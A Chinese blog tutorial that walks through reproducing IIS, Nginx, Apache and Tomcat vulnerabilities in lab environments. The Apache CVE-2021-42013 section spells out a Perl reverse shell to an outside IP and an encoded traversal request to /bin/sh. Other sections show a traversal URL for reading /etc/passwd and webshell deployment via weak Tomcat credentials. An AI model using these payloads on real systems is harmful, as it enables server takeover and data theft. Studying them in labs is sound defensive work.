服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

小灰灰 2023-09-27 18:21 207阅读 0赞

目录

一、导图

二、ISS漏洞

中间件介绍>

1、短文件

2、文件解析

3、HTTP.SYS

4、cve-2017-7269

三、Nignx漏洞

中间件介绍>

1、后缀解析漏洞

2、cve-2013-4547

3、cve-2021-23017 无 EXP

4、cve-2017-7529 意义不大

四、Apache漏洞

中间件介绍>

1、漏洞版本简介

2、cve-2021-42013

3、cve-2021-41773

4、cve-2017-15715

5、cve-2017-9798

6、cve-2018-11759

7、cve-2021-37580

四、Tomcat漏洞

中间件介绍>

1、弱口令猜解

2、cve-2017-12615

3、cve-2020-1938

4、cve-2020-11996

5、cve-2020-9484

一、导图

86193dc8b10743b481e431087be69f3f.png

c9766986f55440e8a1a9a35319e370d6.png

二、ISS漏洞

ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。

ISS中间件主要提供以下功能:

  • 安全代理服务:ISS中间件可以作为代理服务器,将内部网络和Internet隔离开来,有效防止内部网络遭受外部攻击和入侵。
  • 访问控制:ISS中间件可以实现灵活的访问控制,根据用户身份、时间、来源IP等多种因素对网络访问进行限制,保护网络安全。
  • 内容过滤:ISS中间件可以对网络流量进行内容过滤,过滤掉不安全的网站和内容,有效避免恶意软件和垃圾邮件等网络威胁。
  • 网络加速:ISS中间件可以对网络流量进行缓存和压缩,加快网络访问速度,提高用户体验。

需要注意的是,由于Microsoft Forefront TMG已经停止开发和支持,因此ISS中间件也已经成为一种过时的技术。

ISS这个中间件是Windows上的一个中间件,由于现在的网络环境的情况,ISS这个中间件的使用率已经非常少了,一方面是Windows的份额减少了,另一方面是大部分的web程序使用php、java居多,但是ISS这个中间件在部分情况下不支持,虽然其支持php,但是在php方面使用apache的比较多,所以使用ISS的一般都是一些比较老牌的源码,但是其使用量在变得越来越少了,所以其上面的安全问题就变得越来越少,我们碰到的机率也是越来越小了。

1、短文件

信息收集。

2、文件解析

还有点用,但是用处不大。

3、HTTP.SYS

蓝屏崩溃。

4、cve-2017-7269

条件过老。

三、Nignx漏洞

Nginx是一个高性能、高可靠性的HTTP和反向代理服务器,也可以用作电子邮件代理服务器、TCP代理服务器等。Nginx采用事件驱动的异步架构和轻量级的内存占用,能够处理高并发的网络请求,并且具有高度的可扩展性和灵活性。以下是Nginx的一些主要特点和用途:

  1. 高性能:Nginx采用异步非阻塞的IO模型和高效的事件处理机制,可以快速地处理大量的并发请求。
  2. 可靠性:Nginx在设计时考虑到了故障恢复和容错处理机制,保证了系统的可靠性和稳定性。
  3. 反向代理:Nginx可以作为反向代理服务器,将客户端请求转发到后端的应用程序服务器,实现负载均衡和高可用性。
  4. 静态文件服务:Nginx可以快速地响应静态文件请求,支持文件缓存和gzip压缩,提高了网站的响应速度。
  5. 动态内容处理:Nginx可以通过FastCGI、uWSGI等协议与后端的应用程序服务器进行通信,实现动态内容的处理和渲染。
  6. 安全性:Nginx提供了多种安全功能,如SSL/TLS协议支持、HTTP访问控制、DDoS攻击防御等。
  7. 高可扩展性:Nginx支持模块化的设计,可以通过编写自定义模块来扩展其功能。

由于其高性能、可靠性和灵活性,Nginx已经成为了广泛使用的服务器软件之一,被广泛用于Web应用、移动应用、物联网、云计算等领域。

1、后缀解析漏洞

配置不当:该漏洞与 Nginx、php 版本无关,属于用户配置不当造成的解析漏洞。

启动漏洞环境。

c37cc5a1f2de4efbb36788a68382e569.png

打开环境对应的网址。

e29955dc796041c9954da97c4c6038d1.png

上传一张图片,抓取数据包,可以看到其中间件版本以及文件存储路径。

2d1206b6cd72459d92e9e050206555f0.png

通过上面数据包的内容可知其在漏洞的影响范围内。

我们可以首先将文件的路径输入到url后面来观察文件是否存在,可以看到文件确实被上传上去了。

2c770941c2d442dea3b21a3a50fd605a.png

正常来说我们上传的是png图片,是不可能执行处php效果的,但是因为此版本存在漏洞,只需要在url末尾加上一个随便的以php为后缀名的文件,就可以将上传的png内的php代码执行出来。

上传一个图片马后将url更改成下面的样式,可以看到成功将php代码执行了出来。

e6cd0edce8f045a2bc2365d0c69757e8.png

2、cve-2013-4547

这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。

影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

将靶场环境启动。

5e9c095347d4428f846f66e43733e4a7.png

访问靶场页面。

1567a0cd2e32411c9762525a6aedebf1.png

上传文件抓取数据包可以看到其中间件的版本在漏洞的影响范围内。

44704a63fc3541dc88a53b23ce702024.png

将数据包更改成下面的样式后放包(注意1.jpg后面的空格)。

5e2b93c488f04da1951d48ce8d8facac.png

可以看到文件成功上传上去了。

305c252f7b1a47acadb213914549cd45.png

访问上传地址,发现访问不到,因为我们加了空格。

c339a41e3b0b40bf898d1fbe71b73e15.png

我们抓取数据包,将数据包内的内容做出下面的修改。

d264d5b69a474c3881f0528a16f913d4.png

d3820f9dcabb4e4794849d9f2fcd35f4.png

此时发送数据包后可以看到右面成功执行出了php代码。

3、cve-2021-23017 无 EXP

4、cve-2017-7529 意义不大

四、Apache漏洞

<Apache中间件介绍>

Apache是一款开源的跨平台Web服务器软件,具有高度的可靠性、灵活性和可扩展性,是目前全球应用最为广泛的Web服务器软件之一。以下是Apache的一些主要特点和用途:

  1. 可靠性:Apache在设计时考虑到了故障恢复和容错处理机制,能够自动检测并处理运行中出现的故障,提高了系统的可靠性和稳定性。
  2. 可扩展性:Apache具有模块化的设计,可以通过编写自定义模块来扩展其功能,可以根据需要添加或删除模块,提高了软件的灵活性和可扩展性。
  3. 高性能:Apache采用多线程或多进程的架构,可以同时处理多个并发请求,提高了系统的处理能力和性能。
  4. 安全性:Apache提供了多种安全功能,如SSL/TLS协议支持、HTTP访问控制、DDoS攻击防御等,保障了系统的安全性和稳定性。
  5. 反向代理:Apache可以作为反向代理服务器,将客户端请求转发到后端的应用程序服务器,实现负载均衡和高可用性。
  6. 动态内容处理:Apache可以通过FastCGI、uWSGI等协议与后端的应用程序服务器进行通信,实现动态内容的处理和渲染。
  7. 静态文件服务:Apache可以快速地响应静态文件请求,支持文件缓存和gzip压缩,提高了网站的响应速度。

由于其可靠性、灵活性和可扩展性,Apache被广泛用于Web应用、移动应用、物联网、云计算等领域,是目前应用最广泛的Web服务器软件之一。

1、漏洞版本简介

Apache HTTP Server 是美国阿帕奇( Apache )基金会的一款开源网页服务器。该服

务器具有快速、可靠且可通过简单的 API 进行扩充的特点,发现 Apache HTTP

Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍

历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文

件不受通常的默认配置 “ 要求全部拒绝 ” 的保护,则这些请求可能会成功。如果还为这些别

名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache

2.4.49 和 Apache 2.4.50 ,而不影响更早版本。

2、cve-2021-42013

  • RCE

找到对应漏洞将其环境启动。

80eb1addc01d47c3935d1471117e643b.png

访问靶场地址。

d1e55e32551348f4b2918853b9da5fb1.png

抓取数据包可以看到其版本。

b7513de406b94d679d77589b8b789bc2.png

生成一个perl将其复制出来。

  1. echo;perl -e 'use 
  2. Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,ge
  3. tprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))
  4. {open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/b
  5. in/sh -i");};'

c769bc03d9a94a2dbab6b5d5d384de60.png

监听反弹的端口。

07b3d99f5c8e451e9b8308365e065076.png

使用post请求访问,抓取数据包,将数据包更改成下面的样式。

  1. 请求地址:
  2. POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

43f3acf02bc242b09ff8a706263a764d.png

放包之后发现成功接收到了反弹。

26f6450069cf4c1980bfbe32c809931f.png

验证发现其可以成功执行命令。

d7d02cbc5dab41cdbbf5d5326a6ce16c.png

3、cve-2021-41773

  • 目录穿越
  • Apache HTTP Server 2.4.49 、 2.4.50 版本对路径规范化所做的更改中存在一个路 径穿越漏洞,攻击者可利用该漏洞读取到 Web 目录外的其他文件,如系统配置文件、网 站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

将靶场环境启动。

750567ec6b204ae7b869d48dcecda70a.png

访问靶场地址,可以看到其版本在漏洞影响范围内。

613d83d08b634c6db35a73e96366d1f4.png

抓取数据包后将数据包内的地址修改成下面的样式。

  1. /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/
  2. passwd

e7f232287c3647b584e51c8f4d013d39.png

放包后可以看到其所有的密码信息。

d00e7924fa2e4273a8b58e0effdce568.png

我们可以通过更改url末尾的路径来实现任意文件访问。

4、cve-2017-15715

  • 文件解析
  • Apache HTTPD 是一款 HTTP 服务器。其 2.4.0~2.4.29 版本存在一个解析漏洞,在解析 PHP 时,1.php\x0A 将被按照 PHP 后缀进行解析,导致绕过一些服务器的安全策略。

将靶场环境启动。

84b5be19a8c642f78419da3b97ea8dc7.png

访问漏洞地址

b1ba913e018d466fb5db308459be1b51.png

抓包可以确定其符合漏洞版本。

22642628278d4f16a73978d56c9e3c2a.png

上传一个图片文件后抓取数据包。

5c3fe9702efe4ca291ef49546e8bcf4f.png

将数据包更改成下面的样式,放包后发现被拦截了。

01521b9fd3544a89ab4017d872576cb6.png

首先在php的后面加一个空格。

731e4354401b43998eb682408d79727d.png

找到对应位置将其改成0a。

51f314f138c245208743803412106e8a.png

此时再次放包后可以发现没有被拦截,文件成功被上传了上去。

173b219520d6484881d9457704179808.png

我们访问1.php发现访问不到。

eb4af68c3ad842e296b152a160e8c567.png

我们抓取数据包。

e281630c79b4419f9be9d401064af345.png

在如图所示的位置加上一个%0a,发现就可以正常访问了。

2a0b3cb9a0094ae0850095aa027a1315.png

5、cve-2017-9798

价值不高。

6、cve-2018-11759

价值不高。

7、cve-2021-37580

插件问题。

四、Tomcat漏洞

<Tomcat中间件介绍>

Tomcat是一款开源的Web应用服务器软件,是Apache软件基金会的一个开源项目,其主要用途是运行Java Servlet和Java Server Pages(JSP)程序。以下是Tomcat的一些主要特点和用途:

  1. 轻量级:Tomcat相对于其他的Web服务器软件而言,是一款轻量级的软件,它的安装和配置比较简单,适合中小型企业和个人使用。
  2. Java EE支持:Tomcat可以支持Java EE规范中的一些关键组件,如Servlet、JSP、WebSocket等,方便开发人员进行Java Web应用程序的开发和部署。
  3. 可扩展性:Tomcat支持通过编写自定义的Servlet和Filter等组件来扩展其功能,可以根据需要添加或删除组件,提高了软件的灵活性和可扩展性。
  4. 安全性:Tomcat提供了多种安全功能,如SSL/TLS协议支持、访问控制、身份认证等,保障了Web应用程序的安全性和稳定性。
  5. 高性能:Tomcat采用多线程的架构,可以同时处理多个并发请求,提高了系统的处理能力和性能。
  6. 管理界面:Tomcat提供了一个Web管理界面,可以通过浏览器对服务器进行配置、管理和监控。
  7. 兼容性:Tomcat与其他Java EE服务器(如JBoss、WebLogic等)兼容性良好,可以与其它应用服务器无缝集成。

由于其轻量级、可扩展性和Java EE支持等特点,Tomcat被广泛用于Web应用程序的开发和部署,是Java Web开发中最受欢迎的Web服务器软件之一。

1、弱口令猜解

  • 配置不当导致后台弱口令,可通过上传jsp压缩包改名的war拿shell。

找到对应的靶场环境,并将靶场的环境给启动起来。

f674eaf6760b47a19bb79778eed27361.png

打开靶场对应的网站地址。

9739f1cff0e54120b400470bb9d73cd3.png

点击下图所示的位置。

0124332bcdce4c49ab239a9a76c0cf1c.png

进入到了其后台管理的地方,可以看到需要输入账号和密码(其网站的地址为默认的,可以通过直接访问下图中的url来进行尝试)。

28c16208ffc34be595fbe28745b4ddec.png

我们使用常见的默认账号密码来进行尝试登录,如果没有登录成功,则可以使用爆破工具来对其进行爆破,如burp suite等。

这里尝试使用tomcat用户名和密码来尝试进行登录。

07d1de49f23849749c2befaf9fd8f82c.png

登录后看到下面的页面就说明登录成功了。

c4bf8f29e56548e1afd1008b07e9475e.png

进入到这里我们就可以取得网站权限了,此时上传一个jsp后门即可,但是其不能直接对其进行解析,就需要我们使用war包来进行解析,下面来介绍如何制作war包。

打开哥斯拉等工具来生成一个马。

89d4fc4aebf7469c96e7a440452b251a.png

点击生成之后选择jsp,然后点击确定。

6268b7d7ec374030afb0d4ac4fbc59d7.png

选择保存路径后将其保存。

568a9f3ea9f84672b87dfebafdffbe28.png

将生成的文件进行压缩。

0632fa4afa8c435a9b3dd166d6bb8ea8.png

压缩之后将其后缀名更改为war。

9ba26946ba0648fdb99342a55621aef8.png

将修改号文件上传上去。

6218f5ae8fd14b80ba1d1aa3e01e646f.png

此时可以看到我们上传的文件。

dbb77f7b8db241a884cb5a81b42faf7a.png

访问这个地址,会返回404错误。

6e072348a78c4c0a9014c5da9bddd1c3.png

此时只需要在url后面将文件名给添加上去即可,访问后得到空白页面就是我们想要的结果。

08f99b6f0d2a41cf9875ba5f65e5987b.png 来到哥斯拉内完成下面的配置之后点击“测试连接” 。

23befea28af74945950b74743190d038.png

可以看到测试成功。

6432a6a9f4114f4bbddfe7d6bd2ebcb5.png

此时点击“添加”即可。

15c2f34480f245218ad7344a10b92a15.png

点击“进入”。

59d8b50e51864bf18920bce3ebe6f30c.png

可以看到我们成功进入了网站的后台。

313647269a6d4e37999e65056dcd454d.png

2、cve-2017-12615

  • 文件上传
  • 当存在漏洞的Tomcat运行在Windows/Linux主机上,且启用了HTTP PUT请求方法(例如,将readonly初始化参数由默认值设置为false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包合任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。
  • 影响版本:Apache Tomcat 7.0.0-7.0.79

启动漏洞环境。

969cd605c9bc4c888ee096bb9a431f02.png

访问漏洞网站可以看到下面的页面。

ff165ab3a10f4d93aa2864383fac401e.png

访问下面的页面。

dabad3318ccf4de4bcfe0b82c59e5e30.png

抓取数据包。

09223872af3c490daae9fbaf824bf24d.png

将数据包更改成下面的样式。

31fba159a2e04570a3af2e9818157a53.png

放包后可以看到返回了201,即创建了一个返回状态码。

ca2c7b6619cb4edbbb76034cacc8ee6a.png

再次访问,发现页面存在了。

7800da0728954184939ad39046532f46.png

此时使用哥斯拉进行连接即可,与上面的流程一样,这里就不再进行介绍了。

3、cve-2020-1938

  • 文件读取
  • Apache TomcatAJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行。

  • 影响版本:

    Tomcat 6.
    Tomcat 7.    < 7.0.100
    Tomcat 8.*< 8.5.51
    Tomcat 9. < 9.0.31

启动漏洞环境。

1dd2f3bd56124ab2b8e369453e78aa5b.png

使用网上下载的exp执行下面的命令来尝试文件读取,可以看到读取成功了。

06258379ecfe43629bfd0c3db46d0481.png

4、cve-2020-11996

  • 拒绝服务
  • 危害过大,权限无关,意义不大。

5、cve-2020-9484

  • 反序列化
  • 条件苛刻,意义不大。

0389dc7f6e3b40b89d8897766de490dd.png

发表评论

表情:
评论列表 (有 0 条评论,207人围观)

还没有评论,来说两句吧...

相关阅读

    相关 XSS漏洞

    XSS漏洞复现 实验环境DVWA > XSS(cross site script) 跨站脚本。属于代码执行的一种,这里执行的是前端代码,一般是javascript代码。

    迷南。迷南。/ 0/ 629 阅读